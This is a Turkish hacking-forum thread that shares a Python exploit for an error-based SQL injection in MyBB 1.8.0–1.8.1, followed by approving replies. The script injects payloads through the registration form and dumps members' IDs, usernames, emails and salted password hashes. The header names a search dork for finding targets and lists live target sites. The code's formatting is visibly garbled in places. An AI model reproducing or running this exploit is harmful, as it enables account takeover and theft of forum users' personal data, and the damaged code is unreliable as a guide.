Konuyu Oyla:
  • Derecelendirme: 5/5 - 1 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Mybb 1.8.x Exploit
#1




# Exploit Title: MyBB 1.8.X <= 1.8.1 Error based SQL Injection
# Date : 2014-11-15
# Google Dork : intextgrimaceowered By MyBB
# Vendor Homepage: http://www.mybb.com/
# Software Link: http://resources.mybb.com/downloads/mybb_1801.zip
# Version: 1.8.X
# Tested on: Linux / Python 2.7
# Status : Patched in MyBB 1.8.2
# Author : MakMan
# Live Vulnerable Targets : http://livedemo.installatron.com/1416038193mybb/


PHP Kod:
#!/usr/bin/env python
# Exploit Title: MyBB 1.8.X <= 1.8.1 Error based SQL Injection
# Date : 2014-11-15
# Google Dork : intext:Powered By MyBB
# Vendor Homepage: http://www.mybb.com/
# Software Link: http://resources.mybb.com/downloads/mybb_1801.zip
# Version: 1.8.X
# Tested on: Linux / Python 2.7
# Status : Patched in MyBB 1.8.2
# Author : MakMan -- mak.man@live.com -- https://www.facebook.com/hackticlabs
# Live Vulnerable Targets : http://livedemo.installatron.com/1416038193mybb/ : http://gamergate.community/

print '\n\n---------------------------------------------------------------------------------'
print 'Script Coded by MakMan -- Hacktic Labs -- https://www.facebook.com/hackticlabs'
print '-----------------------MyBB 1.8.X Error based SQL Injection---------------------'
print '---------------------------------------------------------------------------------\n\n\n'
url raw_input('Enter URL http://www.exmaple.com/path_to_mybb :: ')
url url.rstrip('/')
ua "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"

import sysre
import urllib2
urllib

def inject
(sql):
    try:
        
urllib2.urlopen(urllib2.Request('%s/member.php' urldata="regcheck1=&regcheck2=true&username=makman&password=mukarram&password2=mukarram&email=mak@live.com&email2=mak@live.com&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1416039333&step=registration&action=do_register&regsubmit=Submit+Registration!&question_id=makman%s" urllib.quote("\' and updatexml(NULL,concat (0x3a,(%s)),NULL) and \'1" sql), headers={"User-agent"ua}))
    
except urllib2.HTTPErrore:
        
data e.read()
            if 
e.code == 503:
                
txt re.search("XPATH syntax error: ':(.*)'"datare.MULTILINE)
                    if 
txt is not None:
                        return 
txt.group(1)
                    return 
'Error , received unexpected data!!'
            
sys.exit('Not Vulnerable i guess !!!')
    
sys.exit('Not Vulnerable or check your inernet connection !!')

def get(nametablenum):
    
sqli 'SELECT %s FROM %s LIMIT %d,1' % (nametablenum)
    
int(inject('LENGTH((%s))' sqli))
    if 
31:
        return 
inject(sqli)
    else:
        
''
        
for i in range(1s+131):
            
+= inject('SUBSTRING((%s), %i, %i)' % (sqlii31))
        return 
r


members_table
inject('select table_name from information_schema.columns where table_schema=database() and column_name regexp 0x61766174617264696d656e73696f6e7324 and table_name regexp 0x757365727324 limit 0,1')
inject('SELECT COUNT(*) FROM %s' members_table)
print 
'----------------------------------------------------------------------------'
print '* Found %s users' n
print '----------------------------------------------------------------------------'
for j in range(int(n)):
        print 
'{:20s} {:20s}'.format('Id',get('uid'members_tablej))
        print 
'{:20s} {:20s}'.format('Name',get('username'members_tablej))
        print 
'{:20s} {:20s}'.format('Email',get('email'members_tablej))
        print 
'{:20s} {:20s}'.format('Password : Salt',get('CONCAT(password,0x3a,salt)'members_tablej))
        print 
'----------------------------------------------------------------------------' 

Kolay gelsin kiss
Beğenenler:
#2
Eline sağlık güzel paylaşım exciting
İnsɑnlɑr değişmez değişen tek şey şɑrtlɑr ve çıkɑrlɑr...
Beğenenler:
#3
(28-06-2015, Saat: 11:32)iMoGeN Adlı Kullanıcıdan Alıntı: Eline sağlık güzel paylaşım exciting

Ben reklam Olur diye exploit Linkini koymamıştım ama exciting
Beğenenler:
#4
Eline Sağlık Dostum
Beğenenler:
#5
eline sağlık, biraz zamanı gecti ama helen kulnan vardır exciting
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  MyBB Forum usercp.php?action=avatar Açığı KingSkrupellos 233 12,038 09-12-2016, Saat: 14:55
Son Yorum: Trajedi
  Joomla Com_Cckjseblod Auto Exploiter FTP Config İndirme Exploit KingSkrupellos 13 262 09-12-2016, Saat: 09:56
Son Yorum: anubis
  Perl ve Python Exploit Bilgisi Anlatım Part 1 Takisik 2 227 23-11-2016, Saat: 08:38
Son Yorum: KingSkrupellos
  Linux x86_64 Privilege Escalation Local Root Exploit KingSkrupellos 1 75 08-11-2016, Saat: 16:09
Son Yorum: RedLife
  İşinize Yarayacak Önemli 5 Exploit AhmetBey 0 23 07-11-2016, Saat: 23:46
Son Yorum: AhmetBey
Anahtar Kelimeler

Mybb 1.8.x Exploit indir, Mybb 1.8.x Exploit Videosu, Mybb 1.8.x Exploit Online izle, Mybb 1.8.x Exploit Bedava indir, Mybb 1.8.x Exploit Yükle, Mybb 1.8.x Exploit Hakkında, Mybb 1.8.x Exploit Nedir, Mybb 1.8.x Exploit Free indir, Mybb 1.8.x Exploit Oyunu, Mybb 1.8.x Exploit Download


1 Ziyaretçi